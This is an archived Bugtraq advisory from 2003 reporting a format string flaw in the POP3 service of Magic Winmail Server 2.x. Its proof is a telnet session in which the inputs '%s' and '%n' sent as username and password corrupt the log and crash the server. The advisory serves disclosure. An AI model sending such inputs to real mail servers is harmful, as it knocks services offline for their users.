Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Magic Winmail Server v.2.*: format string

From: D4rkGr3y <grey_1999 () mail ru>
Date: Sat, 24 May 2003 15:33:53 -0700
-----BEGIN PGP SIGNED MESSAGE-----

################################################################*
#          Damage Hacking Group security advisory
#                     www.dhgroup.org
################################################################*
#Product: Magic Winmail Server
#Auth: AMAX Information Technologies Inc. [www.magicwinmail.net]
#Vulnerable versions: v.2.* (founded in 2.3)
#Vulnerability: format string
################################################################*

#Overview#------------------------------------------------------#
Magic Winmail Server is a professional and easy-use mail server
software, supporting SMTP,POP3,WebMail,anti-virus,multiple
domains,SMTP authentication,remote control, spam filter,user
and domain alias, quotas, mail group, mail route. Magic Winmail
can serve not only as LAN mail server, Internet Mail server,
but also as mail server or gateway switching in with ISDN, xDSL,
Cable Modem.

#Problem#-------------------------------------------------------#
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>telnet 127.0.0.1 110
+OK alpha Magic Winmail Server 2.3(Build 0402) POP3 ready
user %s
+OK
pass %s
- -ERR authorization failed


Connection to host lost.

C:\>type Progra~1\magicw~1\server\logs\pop3.log
2105/Y-19:48:50   2716 Connect from 127.0.0.1
2105/Y-19:48:57   1336 ?-???? not exist

C:\>                   ^^^^^^
                         %s
#########now let's kill it

C:\>telnet 127.0.0.1 110
+OK alpha Magic Winmail Server 2.3(Build 0402) POP3 ready
user %n
+OK
pass %n
- -ERR authorization failed


Connection to host lost.

C:\>telnet 127.0.0.1 110
Connecting To 127.0.0.1...Could not open connection to the host,
on port 110. No connection could be made because the target
machine actively refused it.

C:\>

#Exploit#--------------------------------------------------------#
none

#wow#------------------------------------------------------------#
%$#@ www.dhgroup.org -=> opened English version! Come on in :)

#eof

Best regards               www.dhgroup.org
  D4rkGr3y                    icq 540981

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQCVAwUBPs/zS24LIpseSJmPAQGSPQP+Lu8vaa7UhQG09Wx3hGHsugm6dLR25jwM
kiEdg8pWuX5iMeloFVm91mjyuw5jrWpT1khNbdntZcyQ3Xxs9I/v4szYH/Lfh/fP
GUoE0Ek3aM2oxmpktisB9g/KFoMmOhSskv0AEOwTKEVMPCRS8GWZrrbJERfDcevY
f55hQN4jzSA=
=t1jb
-----END PGP SIGNATURE-----
Previous By Date Next
Previous By Thread Next

Current thread: